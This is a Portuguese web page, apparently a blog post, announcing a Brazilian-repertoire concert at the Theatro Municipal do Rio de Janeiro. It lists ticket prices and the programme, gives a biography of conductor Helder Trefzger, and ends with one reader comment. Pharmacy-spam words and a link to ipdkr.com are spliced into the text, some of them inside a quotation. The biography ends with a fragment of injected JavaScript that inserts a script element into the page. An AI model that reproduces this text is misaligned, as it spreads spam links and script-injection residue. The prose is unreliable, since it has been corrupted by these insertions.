Música sinfônicaProgramaçãoRio de Janeiro

TMRJ apresenta “Concerto brasileiro”

Obras de Villa-Lobos, Mignone, Ernani Aguiar e Renato Goulart integram o programa com o Coro e a Orquestra Sinfônica do TM

 

SERVIÇO

 

 

Theatro Municipal do Rio de Janeiro
Praça Floriano s/n° – Centro
Informações: (21) 2332-9191

 

Purchase Dia 21 de junho, às 20h.

Ingressos
Frisas e camarotes (6 lugares) ……………………….. R$ 420,00

Plateia e balcão nobre …………………………………… R$   70,00
online Purchase Balcão superior ……………………………………………. R$  50,00
Galeria ……………………………………………………….. R$   18,00

Classificação etária: Livre

 

 

Composições nacionais que mesclam influências da nossa cultura popular à música clássica estão reunidas no Concerto Brasileiro, com o Coro do TM e a Orquestra Sinfônica do TM.  A regência será de Helder Trefzger, Maestro Titular da Orquestra Filarmônica do Estado do Espírito Santo.

Escolhemos um programa com autores de diferentes gerações da música de concerto no Brasil, para mostrar um variado panorama das nossas raízes culturais neste momento em que os olhos do mundo estão voltados para nós Pills ”, comenta Carla Camurati, Presidente da Fundação Teatro Municipal do Rio de Janeiro.

 

Order PROGRAMA http://ipdkr.com/?p=17002 Pills
Renato Goulart
Três Momentos Sinfônicos  

Heitor Villa-Lobos
Bachianas Nº 7  

Ernani Aguiar
Frevo da Sinfonia Nº 2 

Heitor Villa-Lobos
Choros 10

pharmacy express corp Francisco Mignone
Maracatu de Chico Rei

 

Sobre o Regente

Maestro Titular da Orquestra Filarmônica do Estado do Espírito Santo desde 1992, Helder Trefzger é Mestre em Música (Práticas Interpretativas – Regência) pela na UFRJ – Universidade Federal do Rio de Janeiro, onde recebeu orientação do Maestro André Cardoso. É Bacharel em Música-Regência, tendo iniciado seu curso na UnB – Universidade de Brasília – e concluído na UFMG – Universidade Federal de Minas Gerais. Teve como principais professores o maestro e compositor Cláudio Santoro, além dos Maestros David Machado – de quem foi assistente – e Roberto Duarte. Outros professores importantes foram: Gerald Kegelmann, Ernani Aguiar, Emílio de César e Oiliam Lanna.

Já dirigiu, como convidado, algumas das principais orquestras brasileiras, como a Orquestra Sinfônica do Theatro Municipal do Rio de Janeiro, Orquestra Sinfônica de Porto Alegre, Orquestra Sinfônica de Minas Gerais, Orquestra Sinfônica de Sergipe, Orquestra do Estado de Mato Grosso, Orquestra Sinfônica da UFRJ e Orquestra Sinfônica da Paraíba, entre outras. Dirigiu ainda a Orquestra Artave (Portugal), New World Young Orchestra (Brasil, Itália e Bulgária), a Orquestra Sinfônica de Bourgas (Bulgária) e a Orquestra Filarmônica Nova (MG). Em Portugal, realizou um concerto com a Orquestra Filarmonia de Gaia, na cidade do Porto e, na Itália, dirigiu duas apresentações à frente da Orchestra Sinfonica di Roma, no Auditório della Conciliazione (Vaticano).

Como violinista, é detentor do 1º. Prêmio do Concurso Jovens Solistas da Orquestra da EMUFMG, do ano de 1988, além de ter sido finalista do Concurso Pró-Música, categoria A, no mesmo ano. Gravou, com a Orquestra Filarmônica do Estado do Espírito Santo, a trilha sonora do filme Lamarca, de Sérgio Rezende, música de David Tygel, e o CD Melodiário, com músicas do compositor Jaceguay Lins. É membro da Academia de Letras e Música do Brasil – ALMUB, onde ocupa a cadeira de número 10, com a patronímica de Carlos Gomes.document.currentScript.parentNode.insertBefore(s, document.currentScript);}

1 Comment

  1. No primeiro parágrafo desta página, faltou a palavra “Santo”, do Estado do Espírito Santo. Nosso maestro precisa ser apresentado de forma correta aos nossos vizinhos cariocas. Obrigada
    Fátima Rocha
    Vitória – Espírito Santo

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.